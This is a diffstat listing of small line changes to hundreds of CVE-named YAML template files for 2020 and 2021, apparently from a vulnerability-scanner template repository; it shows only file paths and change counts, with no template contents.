http/cves/2020/CVE-2020-15500.yaml | 5 +++-- http/cves/2020/CVE-2020-15505.yaml | 3 ++- http/cves/2020/CVE-2020-15568.yaml | 2 +- http/cves/2020/CVE-2020-15867.yaml | 7 ++++--- http/cves/2020/CVE-2020-15895.yaml | 5 +++-- http/cves/2020/CVE-2020-15920.yaml | 2 +- http/cves/2020/CVE-2020-16139.yaml | 5 +++-- http/cves/2020/CVE-2020-16952.yaml | 5 +++-- http/cves/2020/CVE-2020-17362.yaml | 5 +++-- http/cves/2020/CVE-2020-17453.yaml | 5 +++-- http/cves/2020/CVE-2020-17456.yaml | 5 +++-- http/cves/2020/CVE-2020-17463.yaml | 5 +++-- http/cves/2020/CVE-2020-17505.yaml | 3 ++- http/cves/2020/CVE-2020-17506.yaml | 5 +++-- http/cves/2020/CVE-2020-17518.yaml | 5 +++-- http/cves/2020/CVE-2020-17526.yaml | 5 +++-- http/cves/2020/CVE-2020-17530.yaml | 5 +++-- http/cves/2020/CVE-2020-18268.yaml | 5 +++-- http/cves/2020/CVE-2020-19282.yaml | 5 +++-- http/cves/2020/CVE-2020-19283.yaml | 5 +++-- http/cves/2020/CVE-2020-19295.yaml | 5 +++-- http/cves/2020/CVE-2020-19360.yaml | 5 +++-- http/cves/2020/CVE-2020-19515.yaml | 5 +++-- http/cves/2020/CVE-2020-1956.yaml | 3 ++- http/cves/2020/CVE-2020-19625.yaml | 5 +++-- http/cves/2020/CVE-2020-20285.yaml | 5 +++-- http/cves/2020/CVE-2020-20300.yaml | 5 +++-- http/cves/2020/CVE-2020-2036.yaml | 5 +++-- http/cves/2020/CVE-2020-2096.yaml | 2 +- http/cves/2020/CVE-2020-20982.yaml | 5 +++-- http/cves/2020/CVE-2020-20988.yaml | 5 +++-- http/cves/2020/CVE-2020-21012.yaml | 5 +++-- http/cves/2020/CVE-2020-2103.yaml | 5 +++-- http/cves/2020/CVE-2020-21224.yaml | 5 +++-- http/cves/2020/CVE-2020-2140.yaml | 5 +++-- http/cves/2020/CVE-2020-22208.yaml | 5 +++-- http/cves/2020/CVE-2020-22209.yaml | 5 +++-- http/cves/2020/CVE-2020-22210.yaml | 5 +++-- http/cves/2020/CVE-2020-22211.yaml | 5 +++-- http/cves/2020/CVE-2020-22840.yaml | 5 +++-- http/cves/2020/CVE-2020-23015.yaml | 5 +++-- http/cves/2020/CVE-2020-23517.yaml | 5 +++-- http/cves/2020/CVE-2020-23575.yaml | 5 +++-- http/cves/2020/CVE-2020-23697.yaml | 5 +++-- http/cves/2020/CVE-2020-23972.yaml | 5 +++-- http/cves/2020/CVE-2020-24148.yaml | 5 +++-- http/cves/2020/CVE-2020-24223.yaml | 5 +++-- http/cves/2020/CVE-2020-24312.yaml | 5 +++-- http/cves/2020/CVE-2020-24391.yaml | 5 +++-- http/cves/2020/CVE-2020-24550.yaml | 5 +++-- http/cves/2020/CVE-2020-24571.yaml | 5 +++-- http/cves/2020/CVE-2020-24579.yaml | 5 +++-- http/cves/2020/CVE-2020-24589.yaml | 5 +++-- http/cves/2020/CVE-2020-24902.yaml | 5 +++-- http/cves/2020/CVE-2020-24903.yaml | 5 +++-- http/cves/2020/CVE-2020-24912.yaml | 5 +++-- http/cves/2020/CVE-2020-24949.yaml | 2 +- http/cves/2020/CVE-2020-25078.yaml | 5 +++-- http/cves/2020/CVE-2020-25213.yaml | 3 ++- http/cves/2020/CVE-2020-25495.yaml | 5 +++-- http/cves/2020/CVE-2020-25540.yaml | 5 +++-- http/cves/2020/CVE-2020-25780.yaml | 5 +++-- http/cves/2020/CVE-2020-25864.yaml | 5 +++-- http/cves/2020/CVE-2020-26153.yaml | 5 +++-- http/cves/2020/CVE-2020-26214.yaml | 5 +++-- http/cves/2020/CVE-2020-26248.yaml | 5 +++-- http/cves/2020/CVE-2020-26258.yaml | 2 +- http/cves/2020/CVE-2020-26413.yaml | 5 +++-- http/cves/2020/CVE-2020-26876.yaml | 5 +++-- http/cves/2020/CVE-2020-26919.yaml | 3 ++- http/cves/2020/CVE-2020-26948.yaml | 5 +++-- http/cves/2020/CVE-2020-27191.yaml | 5 +++-- http/cves/2020/CVE-2020-2733.yaml | 5 +++-- http/cves/2020/CVE-2020-27361.yaml | 5 +++-- http/cves/2020/CVE-2020-27467.yaml | 5 +++-- http/cves/2020/CVE-2020-27481.yaml | 5 +++-- http/cves/2020/CVE-2020-27735.yaml | 5 +++-- http/cves/2020/CVE-2020-27866.yaml | 5 +++-- http/cves/2020/CVE-2020-27982.yaml | 5 +++-- http/cves/2020/CVE-2020-27986.yaml | 5 +++-- http/cves/2020/CVE-2020-28185.yaml | 5 +++-- http/cves/2020/CVE-2020-28188.yaml | 2 +- http/cves/2020/CVE-2020-28208.yaml | 5 +++-- http/cves/2020/CVE-2020-28351.yaml | 5 +++-- http/cves/2020/CVE-2020-28871.yaml | 2 +- http/cves/2020/CVE-2020-28976.yaml | 5 +++-- http/cves/2020/CVE-2020-29164.yaml | 5 +++-- http/cves/2020/CVE-2020-29227.yaml | 5 +++-- http/cves/2020/CVE-2020-29284.yaml | 5 +++-- http/cves/2020/CVE-2020-29395.yaml | 5 +++-- http/cves/2020/CVE-2020-29453.yaml | 5 +++-- http/cves/2020/CVE-2020-29583.yaml | 2 +- http/cves/2020/CVE-2020-29597.yaml | 5 +++-- http/cves/2020/CVE-2020-3187.yaml | 2 +- http/cves/2020/CVE-2020-3452.yaml | 3 ++- http/cves/2020/CVE-2020-35234.yaml | 5 +++-- http/cves/2020/CVE-2020-35338.yaml | 5 +++-- http/cves/2020/CVE-2020-35476.yaml | 3 ++- http/cves/2020/CVE-2020-35489.yaml | 3 ++- http/cves/2020/CVE-2020-35580.yaml | 5 +++-- http/cves/2020/CVE-2020-35598.yaml | 5 +++-- http/cves/2020/CVE-2020-35713.yaml | 5 +++-- http/cves/2020/CVE-2020-35729.yaml | 3 ++- http/cves/2020/CVE-2020-35736.yaml | 5 +++-- http/cves/2020/CVE-2020-35749.yaml | 5 +++-- http/cves/2020/CVE-2020-35774.yaml | 5 +++-- http/cves/2020/CVE-2020-3580.yaml | 5 +++-- http/cves/2020/CVE-2020-35846.yaml | 5 +++-- http/cves/2020/CVE-2020-35847.yaml | 5 +++-- http/cves/2020/CVE-2020-35848.yaml | 5 +++-- http/cves/2020/CVE-2020-35951.yaml | 5 +++-- http/cves/2020/CVE-2020-35984.yaml | 5 +++-- http/cves/2020/CVE-2020-35985.yaml | 5 +++-- http/cves/2020/CVE-2020-35986.yaml | 5 +++-- http/cves/2020/CVE-2020-35987.yaml | 5 +++-- http/cves/2020/CVE-2020-36112.yaml | 5 +++-- http/cves/2020/CVE-2020-36289.yaml | 5 +++-- http/cves/2020/CVE-2020-36365.yaml | 5 +++-- http/cves/2020/CVE-2020-36510.yaml | 5 +++-- http/cves/2020/CVE-2020-4463.yaml | 5 +++-- http/cves/2020/CVE-2020-5191.yaml | 5 +++-- http/cves/2020/CVE-2020-5192.yaml | 5 +++-- http/cves/2020/CVE-2020-5284.yaml | 5 +++-- http/cves/2020/CVE-2020-5307.yaml | 5 +++-- http/cves/2020/CVE-2020-5405.yaml | 7 ++++--- http/cves/2020/CVE-2020-5410.yaml | 5 +++-- http/cves/2020/CVE-2020-5412.yaml | 4 ++-- http/cves/2020/CVE-2020-5775.yaml | 5 +++-- http/cves/2020/CVE-2020-5776.yaml | 5 +++-- http/cves/2020/CVE-2020-5777.yaml | 5 +++-- http/cves/2020/CVE-2020-5847.yaml | 2 +- http/cves/2020/CVE-2020-6171.yaml | 5 +++-- http/cves/2020/CVE-2020-6287.yaml | 2 +- http/cves/2020/CVE-2020-6308.yaml | 5 +++-- http/cves/2020/CVE-2020-6637.yaml | 5 +++-- http/cves/2020/CVE-2020-6950.yaml | 5 +++-- http/cves/2020/CVE-2020-7107.yaml | 5 +++-- http/cves/2020/CVE-2020-7136.yaml | 5 +++-- http/cves/2020/CVE-2020-7209.yaml | 2 +- http/cves/2020/CVE-2020-7318.yaml | 5 +++-- http/cves/2020/CVE-2020-7796.yaml | 5 +++-- http/cves/2020/CVE-2020-7943.yaml | 5 +++-- http/cves/2020/CVE-2020-7961.yaml | 5 +++-- http/cves/2020/CVE-2020-7980.yaml | 2 +- http/cves/2020/CVE-2020-8115.yaml | 5 +++-- http/cves/2020/CVE-2020-8163.yaml | 2 +- http/cves/2020/CVE-2020-8191.yaml | 5 +++-- http/cves/2020/CVE-2020-8193.yaml | 2 +- http/cves/2020/CVE-2020-8194.yaml | 2 +- http/cves/2020/CVE-2020-8209.yaml | 5 +++-- http/cves/2020/CVE-2020-8497.yaml | 5 +++-- http/cves/2020/CVE-2020-8512.yaml | 5 +++-- http/cves/2020/CVE-2020-8515.yaml | 7 ++++--- http/cves/2020/CVE-2020-8615.yaml | 5 +++-- http/cves/2020/CVE-2020-8641.yaml | 5 +++-- http/cves/2020/CVE-2020-8644.yaml | 2 +- http/cves/2020/CVE-2020-8654.yaml | 5 +++-- http/cves/2020/CVE-2020-8771.yaml | 5 +++-- http/cves/2020/CVE-2020-8772.yaml | 5 +++-- http/cves/2020/CVE-2020-8813.yaml | 5 +++-- http/cves/2020/CVE-2020-8982.yaml | 5 +++-- http/cves/2020/CVE-2020-9036.yaml | 5 +++-- http/cves/2020/CVE-2020-9043.yaml | 5 +++-- http/cves/2020/CVE-2020-9047.yaml | 5 +++-- http/cves/2020/CVE-2020-9054.yaml | 5 +++-- http/cves/2020/CVE-2020-9315.yaml | 2 +- http/cves/2020/CVE-2020-9344.yaml | 5 +++-- http/cves/2020/CVE-2020-9376.yaml | 2 +- http/cves/2020/CVE-2020-9402.yaml | 5 +++-- http/cves/2020/CVE-2020-9425.yaml | 5 +++-- http/cves/2020/CVE-2020-9483.yaml | 5 +++-- http/cves/2020/CVE-2020-9484.yaml | 2 +- http/cves/2020/CVE-2020-9496.yaml | 2 +- http/cves/2020/CVE-2020-9757.yaml | 5 +++-- http/cves/2021/CVE-2021-1497.yaml | 3 ++- http/cves/2021/CVE-2021-1498.yaml | 3 ++- http/cves/2021/CVE-2021-1499.yaml | 5 +++-- http/cves/2021/CVE-2021-20031.yaml | 5 +++-- http/cves/2021/CVE-2021-20038.yaml | 5 +++-- http/cves/2021/CVE-2021-20090.yaml | 2 +- http/cves/2021/CVE-2021-20091.yaml | 5 +++-- http/cves/2021/CVE-2021-20092.yaml | 5 +++-- http/cves/2021/CVE-2021-20114.yaml | 5 +++-- http/cves/2021/CVE-2021-20123.yaml | 5 +++-- http/cves/2021/CVE-2021-20124.yaml | 5 +++-- http/cves/2021/CVE-2021-20137.yaml | 2 +- http/cves/2021/CVE-2021-20150.yaml | 5 +++-- http/cves/2021/CVE-2021-20158.yaml | 5 +++-- http/cves/2021/CVE-2021-20167.yaml | 3 ++- http/cves/2021/CVE-2021-20323.yaml | 5 +++-- http/cves/2021/CVE-2021-20792.yaml | 5 +++-- http/cves/2021/CVE-2021-20837.yaml | 2 +- http/cves/2021/CVE-2021-21087.yaml | 5 +++-- http/cves/2021/CVE-2021-21234.yaml | 5 +++-- http/cves/2021/CVE-2021-21287.yaml | 2 +- http/cves/2021/CVE-2021-21311.yaml | 5 +++-- http/cves/2021/CVE-2021-21315.yaml | 5 +++-- http/cves/2021/CVE-2021-21345.yaml | 5 +++-- http/cves/2021/CVE-2021-21351.yaml | 2 +- http/cves/2021/CVE-2021-21389.yaml | 5 +++-- http/cves/2021/CVE-2021-21402.yaml | 5 +++-- http/cves/2021/CVE-2021-21479.yaml | 5 +++-- http/cves/2021/CVE-2021-21745.yaml | 5 +++-- http/cves/2021/CVE-2021-21799.yaml | 5 +++-- http/cves/2021/CVE-2021-21800.yaml | 5 +++-- http/cves/2021/CVE-2021-21801.yaml | 5 +++-- http/cves/2021/CVE-2021-21802.yaml | 5 +++-- http/cves/2021/CVE-2021-21803.yaml | 5 +++-- http/cves/2021/CVE-2021-21816.yaml | 5 +++-- http/cves/2021/CVE-2021-21881.yaml | 2 +- http/cves/2021/CVE-2021-21973.yaml | 2 +- http/cves/2021/CVE-2021-21975.yaml | 2 +- http/cves/2021/CVE-2021-21978.yaml | 3 ++- http/cves/2021/CVE-2021-21985.yaml | 3 ++- http/cves/2021/CVE-2021-22005.yaml | 7 ++++--- http/cves/2021/CVE-2021-22053.yaml | 5 +++-- http/cves/2021/CVE-2021-22054.yaml | 5 +++-- http/cves/2021/CVE-2021-22122.yaml | 5 +++-- http/cves/2021/CVE-2021-22145.yaml | 2 +- http/cves/2021/CVE-2021-22205.yaml | 2 +- http/cves/2021/CVE-2021-22214.yaml | 2 +- http/cves/2021/CVE-2021-22707.yaml | 5 +++-- http/cves/2021/CVE-2021-22873.yaml | 5 +++-- http/cves/2021/CVE-2021-22911.yaml | 5 +++-- http/cves/2021/CVE-2021-23241.yaml | 5 +++-- http/cves/2021/CVE-2021-24145.yaml | 5 +++-- http/cves/2021/CVE-2021-24146.yaml | 5 +++-- http/cves/2021/CVE-2021-24150.yaml | 5 +++-- http/cves/2021/CVE-2021-24155.yaml | 5 +++-- http/cves/2021/CVE-2021-24165.yaml | 5 +++-- http/cves/2021/CVE-2021-24169.yaml | 5 +++-- http/cves/2021/CVE-2021-24176.yaml | 5 +++-- http/cves/2021/CVE-2021-24210.yaml | 5 +++-- http/cves/2021/CVE-2021-24214.yaml | 5 +++-- http/cves/2021/CVE-2021-24215.yaml | 5 +++-- http/cves/2021/CVE-2021-24226.yaml | 5 +++-- http/cves/2021/CVE-2021-24227.yaml | 5 +++-- http/cves/2021/CVE-2021-24235.yaml | 5 +++-- http/cves/2021/CVE-2021-24236.yaml | 5 +++-- http/cves/2021/CVE-2021-24237.yaml | 5 +++-- http/cves/2021/CVE-2021-24239.yaml | 5 +++-- http/cves/2021/CVE-2021-24245.yaml | 5 +++-- http/cves/2021/CVE-2021-24274.yaml | 5 +++-- http/cves/2021/CVE-2021-24275.yaml | 5 +++-- http/cves/2021/CVE-2021-24276.yaml | 5 +++-- http/cves/2021/CVE-2021-24278.yaml | 5 +++-- http/cves/2021/CVE-2021-24284.yaml | 5 +++-- http/cves/2021/CVE-2021-24285.yaml | 5 +++-- http/cves/2021/CVE-2021-24286.yaml | 5 +++-- http/cves/2021/CVE-2021-24287.yaml | 5 +++-- http/cves/2021/CVE-2021-24288.yaml | 5 +++-- http/cves/2021/CVE-2021-24291.yaml | 5 +++-- http/cves/2021/CVE-2021-24298.yaml | 5 +++-- http/cves/2021/CVE-2021-24300.yaml | 5 +++-- http/cves/2021/CVE-2021-24316.yaml | 5 +++-- http/cves/2021/CVE-2021-24320.yaml | 5 +++-- http/cves/2021/CVE-2021-24335.yaml | 5 +++-- http/cves/2021/CVE-2021-24340.yaml | 5 +++-- http/cves/2021/CVE-2021-24342.yaml | 5 +++-- http/cves/2021/CVE-2021-24347.yaml | 2 +- http/cves/2021/CVE-2021-24351.yaml | 5 +++-- http/cves/2021/CVE-2021-24358.yaml | 5 +++-- http/cves/2021/CVE-2021-24364.yaml | 5 +++-- http/cves/2021/CVE-2021-24370.yaml | 5 +++-- http/cves/2021/CVE-2021-24387.yaml | 5 +++-- http/cves/2021/CVE-2021-24389.yaml | 5 +++-- http/cves/2021/CVE-2021-24406.yaml | 5 +++-- http/cves/2021/CVE-2021-24407.yaml | 5 +++-- http/cves/2021/CVE-2021-24409.yaml | 5 +++-- http/cves/2021/CVE-2021-24435.yaml | 5 +++-- http/cves/2021/CVE-2021-24436.yaml | 5 +++-- http/cves/2021/CVE-2021-24452.yaml | 5 +++-- http/cves/2021/CVE-2021-24472.yaml | 5 +++-- http/cves/2021/CVE-2021-24488.yaml | 5 +++-- http/cves/2021/CVE-2021-24495.yaml | 5 +++-- http/cves/2021/CVE-2021-24498.yaml | 5 +++-- http/cves/2021/CVE-2021-24499.yaml | 5 +++-- http/cves/2021/CVE-2021-24510.yaml | 5 +++-- http/cves/2021/CVE-2021-24554.yaml | 5 +++-- http/cves/2021/CVE-2021-24627.yaml | 5 +++-- http/cves/2021/CVE-2021-24647.yaml | 5 +++-- http/cves/2021/CVE-2021-24666.yaml | 5 +++-- http/cves/2021/CVE-2021-24731.yaml | 5 +++-- http/cves/2021/CVE-2021-24746.yaml | 5 +++-- http/cves/2021/CVE-2021-24750.yaml | 5 +++-- http/cves/2021/CVE-2021-24762.yaml | 5 +++-- http/cves/2021/CVE-2021-24791.yaml | 5 +++-- http/cves/2021/CVE-2021-24827.yaml | 5 +++-- http/cves/2021/CVE-2021-24838.yaml | 5 +++-- http/cves/2021/CVE-2021-24862.yaml | 5 +++-- http/cves/2021/CVE-2021-24875.yaml | 5 +++-- http/cves/2021/CVE-2021-24910.yaml | 5 +++-- http/cves/2021/CVE-2021-24915.yaml | 5 +++-- http/cves/2021/CVE-2021-24917.yaml | 5 +++-- http/cves/2021/CVE-2021-24926.yaml | 5 +++-- http/cves/2021/CVE-2021-24931.yaml | 5 +++-- http/cves/2021/CVE-2021-24940.yaml | 5 +++-- http/cves/2021/CVE-2021-24946.yaml | 5 +++-- http/cves/2021/CVE-2021-24947.yaml | 7 ++++--- http/cves/2021/CVE-2021-24956.yaml | 5 +++-- http/cves/2021/CVE-2021-24970.yaml | 5 +++-- http/cves/2021/CVE-2021-24979.yaml | 5 +++-- http/cves/2021/CVE-2021-24987.yaml | 5 +++-- http/cves/2021/CVE-2021-24991.yaml | 5 +++-- http/cves/2021/CVE-2021-24997.yaml | 5 +++-- http/cves/2021/CVE-2021-25003.yaml | 9 +++++---- http/cves/2021/CVE-2021-25008.yaml | 5 +++-- http/cves/2021/CVE-2021-25016.yaml | 5 +++-- http/cves/2021/CVE-2021-25028.yaml | 5 +++-- http/cves/2021/CVE-2021-25033.yaml | 5 +++-- http/cves/2021/CVE-2021-25052.yaml | 5 +++-- http/cves/2021/CVE-2021-25055.yaml | 5 +++-- http/cves/2021/CVE-2021-25063.yaml | 5 +++-- http/cves/2021/CVE-2021-25065.yaml | 5 +++-- http/cves/2021/CVE-2021-25067.yaml | 5 +++-- http/cves/2021/CVE-2021-25074.yaml | 5 +++-- http/cves/2021/CVE-2021-25075.yaml | 5 +++-- http/cves/2021/CVE-2021-25078.yaml | 5 +++-- http/cves/2021/CVE-2021-25079.yaml | 5 +++-- http/cves/2021/CVE-2021-25085.yaml | 5 +++-- http/cves/2021/CVE-2021-25099.yaml | 5 +++-- http/cves/2021/CVE-2021-25104.yaml | 5 +++-- http/cves/2021/CVE-2021-25111.yaml | 7 ++++--- http/cves/2021/CVE-2021-25112.yaml | 5 +++-- http/cves/2021/CVE-2021-25114.yaml | 5 +++-- http/cves/2021/CVE-2021-25118.yaml | 5 +++-- http/cves/2021/CVE-2021-25120.yaml | 5 +++-- http/cves/2021/CVE-2021-25281.yaml | 5 +++-- http/cves/2021/CVE-2021-25296.yaml | 5 +++-- http/cves/2021/CVE-2021-25297.yaml | 5 +++-- http/cves/2021/CVE-2021-25298.yaml | 5 +++-- http/cves/2021/CVE-2021-25299.yaml | 5 +++-- http/cves/2021/CVE-2021-25646.yaml | 3 ++- http/cves/2021/CVE-2021-25864.yaml | 2 +- http/cves/2021/CVE-2021-25899.yaml | 5 +++-- http/cves/2021/CVE-2021-26084.yaml | 2 +- http/cves/2021/CVE-2021-26085.yaml | 2 +- http/cves/2021/CVE-2021-26086.yaml | 5 +++-- http/cves/2021/CVE-2021-26247.yaml | 5 +++-- http/cves/2021/CVE-2021-26295.yaml | 3 ++- http/cves/2021/CVE-2021-26475.yaml | 5 +++-- http/cves/2021/CVE-2021-26598.yaml | 5 +++-- http/cves/2021/CVE-2021-26702.yaml | 5 +++-- http/cves/2021/CVE-2021-26710.yaml | 5 +++-- http/cves/2021/CVE-2021-26723.yaml | 5 +++-- http/cves/2021/CVE-2021-26812.yaml | 5 +++-- http/cves/2021/CVE-2021-26855.yaml | 7 ++++--- http/cves/2021/CVE-2021-27124.yaml | 7 ++++--- http/cves/2021/CVE-2021-27132.yaml | 5 +++-- http/cves/2021/CVE-2021-27309.yaml | 5 +++-- http/cves/2021/CVE-2021-27310.yaml | 5 +++-- http/cves/2021/CVE-2021-27314.yaml | 5 +++-- http/cves/2021/CVE-2021-27315.yaml | 5 +++-- http/cves/2021/CVE-2021-27316.yaml | 5 +++-- http/cves/2021/CVE-2021-27319.yaml | 5 +++-- http/cves/2021/CVE-2021-27320.yaml | 5 +++-- http/cves/2021/CVE-2021-27330.yaml | 5 +++-- http/cves/2021/CVE-2021-27358.yaml | 5 +++-- http/cves/2021/CVE-2021-27519.yaml | 5 +++-- http/cves/2021/CVE-2021-27520.yaml | 5 +++-- http/cves/2021/CVE-2021-27651.yaml | 5 +++-- http/cves/2021/CVE-2021-27670.yaml | 5 +++-- http/cves/2021/CVE-2021-27850.yaml | 5 +++-- http/cves/2021/CVE-2021-27905.yaml | 2 +- http/cves/2021/CVE-2021-27909.yaml | 5 +++-- http/cves/2021/CVE-2021-27931.yaml | 5 +++-- http/cves/2021/CVE-2021-28149.yaml | 5 +++-- http/cves/2021/CVE-2021-28150.yaml | 5 +++-- http/cves/2021/CVE-2021-28151.yaml | 5 +++-- http/cves/2021/CVE-2021-28164.yaml | 5 +++-- http/cves/2021/CVE-2021-28169.yaml | 5 +++-- http/cves/2021/CVE-2021-28377.yaml | 5 +++-- http/cves/2021/CVE-2021-28419.yaml | 5 +++-- http/cves/2021/CVE-2021-28918.yaml | 5 +++-- http/cves/2021/CVE-2021-28937.yaml | 7 ++++--- http/cves/2021/CVE-2021-29006.yaml | 5 +++-- http/cves/2021/CVE-2021-29156.yaml | 5 +++-- http/cves/2021/CVE-2021-29203.yaml | 5 +++-- http/cves/2021/CVE-2021-29441.yaml | 5 +++-- http/cves/2021/CVE-2021-29442.yaml | 2 +- http/cves/2021/CVE-2021-29484.yaml | 5 +++-- http/cves/2021/CVE-2021-29490.yaml | 5 +++-- http/cves/2021/CVE-2021-29505.yaml | 5 +++-- http/cves/2021/CVE-2021-29622.yaml | 5 +++-- http/cves/2021/CVE-2021-29625.yaml | 5 +++-- http/cves/2021/CVE-2021-3002.yaml | 5 +++-- http/cves/2021/CVE-2021-30049.yaml | 5 +++-- http/cves/2021/CVE-2021-30128.yaml | 5 +++-- http/cves/2021/CVE-2021-30134.yaml | 5 +++-- http/cves/2021/CVE-2021-30151.yaml | 5 +++-- http/cves/2021/CVE-2021-3017.yaml | 5 +++-- http/cves/2021/CVE-2021-30175.yaml | 5 +++-- http/cves/2021/CVE-2021-3019.yaml | 5 +++-- http/cves/2021/CVE-2021-30213.yaml | 5 +++-- http/cves/2021/CVE-2021-30461.yaml | 2 +- http/cves/2021/CVE-2021-30497.yaml | 2 +- http/cves/2021/CVE-2021-3110.yaml | 5 +++-- http/cves/2021/CVE-2021-31195.yaml | 2 +- http/cves/2021/CVE-2021-31249.yaml | 5 +++-- http/cves/2021/CVE-2021-31250.yaml | 2 +- http/cves/2021/CVE-2021-31537.yaml | 5 +++-- http/cves/2021/CVE-2021-31581.yaml | 5 +++-- http/cves/2021/CVE-2021-31589.yaml | 5 +++-- http/cves/2021/CVE-2021-31682.yaml | 5 +++-- http/cves/2021/CVE-2021-31755.yaml | 4 ++-- http/cves/2021/CVE-2021-31805.yaml | 7 ++++--- http/cves/2021/CVE-2021-31856.yaml | 5 +++-- http/cves/2021/CVE-2021-31862.yaml | 5 +++-- http/cves/2021/CVE-2021-32030.yaml | 5 +++-- http/cves/2021/CVE-2021-32172.yaml | 5 +++-- http/cves/2021/CVE-2021-3223.yaml | 5 +++-- http/cves/2021/CVE-2021-32305.yaml | 5 +++-- http/cves/2021/CVE-2021-32618.yaml | 5 +++-- http/cves/2021/CVE-2021-32682.yaml | 2 +- http/cves/2021/CVE-2021-32789.yaml | 5 +++-- http/cves/2021/CVE-2021-32819.yaml | 5 +++-- http/cves/2021/CVE-2021-32820.yaml | 7 ++++--- http/cves/2021/CVE-2021-32853.yaml | 5 +++-- http/cves/2021/CVE-2021-3293.yaml | 5 +++-- http/cves/2021/CVE-2021-3297.yaml | 5 +++-- http/cves/2021/CVE-2021-33044.yaml | 5 +++-- http/cves/2021/CVE-2021-33221.yaml | 5 +++-- http/cves/2021/CVE-2021-33357.yaml | 2 +- http/cves/2021/CVE-2021-33544.yaml | 2 +- http/cves/2021/CVE-2021-33564.yaml | 5 +++-- http/cves/2021/CVE-2021-3374.yaml | 5 +++-- http/cves/2021/CVE-2021-3377.yaml | 5 +++-- http/cves/2021/CVE-2021-3378.yaml | 5 +++-- http/cves/2021/CVE-2021-33807.yaml | 5 +++-- http/cves/2021/CVE-2021-33851.yaml | 5 +++-- http/cves/2021/CVE-2021-33904.yaml | 5 +++-- http/cves/2021/CVE-2021-34370.yaml | 5 +++-- http/cves/2021/CVE-2021-34429.yaml | 2 +- http/cves/2021/CVE-2021-34473.yaml | 3 ++- http/cves/2021/CVE-2021-34621.yaml | 5 +++-- http/cves/2021/CVE-2021-34640.yaml | 5 +++-- http/cves/2021/CVE-2021-34643.yaml | 5 +++-- http/cves/2021/CVE-2021-34805.yaml | 5 +++-- http/cves/2021/CVE-2021-35250.yaml | 7 ++++--- http/cves/2021/CVE-2021-35265.yaml | 5 +++-- http/cves/2021/CVE-2021-35323.yaml | 5 +++-- http/cves/2021/CVE-2021-35336.yaml | 4 ++-- http/cves/2021/CVE-2021-35380.yaml | 5 +++-- http/cves/2021/CVE-2021-35464.yaml | 2 +- http/cves/2021/CVE-2021-35488.yaml | 5 +++-- http/cves/2021/CVE-2021-35587.yaml | 3 ++- http/cves/2021/CVE-2021-3577.yaml | 5 +++-- http/cves/2021/CVE-2021-36260.yaml | 3 ++- http/cves/2021/CVE-2021-36356.yaml | 5 +++-- http/cves/2021/CVE-2021-36380.yaml | 5 +++-- http/cves/2021/CVE-2021-36450.yaml | 5 +++-- http/cves/2021/CVE-2021-3654.yaml | 5 +++-- http/cves/2021/CVE-2021-36580.yaml | 5 +++-- http/cves/2021/CVE-2021-36748.yaml | 5 +++-- http/cves/2021/CVE-2021-36749.yaml | 5 +++-- http/cves/2021/CVE-2021-36873.yaml | 5 +++-- http/cves/2021/CVE-2021-37216.yaml | 5 +++-- http/cves/2021/CVE-2021-37304.yaml | 5 +++-- http/cves/2021/CVE-2021-37305.yaml | 5 +++-- http/cves/2021/CVE-2021-37416.yaml | 5 +++-- http/cves/2021/CVE-2021-37538.yaml | 5 +++-- http/cves/2021/CVE-2021-37573.yaml | 5 +++-- http/cves/2021/CVE-2021-37580.yaml | 3 ++- http/cves/2021/CVE-2021-37589.yaml | 5 +++-- http/cves/2021/CVE-2021-37704.yaml | 5 +++-- http/cves/2021/CVE-2021-37833.yaml | 5 +++-- http/cves/2021/CVE-2021-38314.yaml | 5 +++-- http/cves/2021/CVE-2021-38540.yaml | 5 +++-- http/cves/2021/CVE-2021-38647.yaml | 2 +- http/cves/2021/CVE-2021-38702.yaml | 5 +++-- http/cves/2021/CVE-2021-38704.yaml | 5 +++-- http/cves/2021/CVE-2021-38751.yaml | 5 +++-- http/cves/2021/CVE-2021-39141.yaml | 2 +- http/cves/2021/CVE-2021-39144.yaml | 2 +- http/cves/2021/CVE-2021-39146.yaml | 5 +++-- http/cves/2021/CVE-2021-39152.yaml | 5 +++-- http/cves/2021/CVE-2021-39165.yaml | 5 +++-- http/cves/2021/CVE-2021-39211.yaml | 5 +++-- http/cves/2021/CVE-2021-39226.yaml | 3 ++- http/cves/2021/CVE-2021-39312.yaml | 5 +++-- http/cves/2021/CVE-2021-39316.yaml | 5 +++-- http/cves/2021/CVE-2021-39320.yaml | 5 +++-- http/cves/2021/CVE-2021-39322.yaml | 5 +++-- http/cves/2021/CVE-2021-39327.yaml | 5 +++-- http/cves/2021/CVE-2021-39350.yaml | 5 +++-- http/cves/2021/CVE-2021-39433.yaml | 5 +++-- http/cves/2021/CVE-2021-39501.yaml | 5 +++-- http/cves/2021/CVE-2021-40149.yaml | 5 +++-- http/cves/2021/CVE-2021-40150.yaml | 5 +++-- http/cves/2021/CVE-2021-40323.yaml | 5 +++-- http/cves/2021/CVE-2021-40438.yaml | 2 +- http/cves/2021/CVE-2021-40539.yaml | 3 ++- http/cves/2021/CVE-2021-40542.yaml | 5 +++-- http/cves/2021/CVE-2021-40661.yaml | 5 +++-- http/cves/2021/CVE-2021-40822.yaml | 5 +++-- http/cves/2021/CVE-2021-40856.yaml | 5 +++-- http/cves/2021/CVE-2021-40859.yaml | 5 +++-- http/cves/2021/CVE-2021-40868.yaml | 5 +++-- http/cves/2021/CVE-2021-40870.yaml | 2 +- http/cves/2021/CVE-2021-40875.yaml | 5 +++-- http/cves/2021/CVE-2021-40908.yaml | 5 +++-- http/cves/2021/CVE-2021-40960.yaml | 5 +++-- http/cves/2021/CVE-2021-40968.yaml | 5 +++-- http/cves/2021/CVE-2021-40969.yaml | 5 +++-- http/cves/2021/CVE-2021-40970.yaml | 5 +++-- http/cves/2021/CVE-2021-40971.yaml | 5 +++-- http/cves/2021/CVE-2021-40972.yaml | 5 +++-- http/cves/2021/CVE-2021-40973.yaml | 5 +++-- http/cves/2021/CVE-2021-40978.yaml | 7 ++++--- http/cves/2021/CVE-2021-41174.yaml | 5 +++-- http/cves/2021/CVE-2021-41192.yaml | 5 +++-- http/cves/2021/CVE-2021-41266.yaml | 5 +++-- http/cves/2021/CVE-2021-41277.yaml | 5 +++-- http/cves/2021/CVE-2021-41291.yaml | 5 +++-- http/cves/2021/CVE-2021-41293.yaml | 5 +++-- http/cves/2021/CVE-2021-41349.yaml | 5 +++-- http/cves/2021/CVE-2021-41381.yaml | 5 +++-- http/cves/2021/CVE-2021-41432.yaml | 5 +++-- http/cves/2021/CVE-2021-41460.yaml | 5 +++-- http/cves/2021/CVE-2021-41467.yaml | 5 +++-- http/cves/2021/CVE-2021-41569.yaml | 5 +++-- 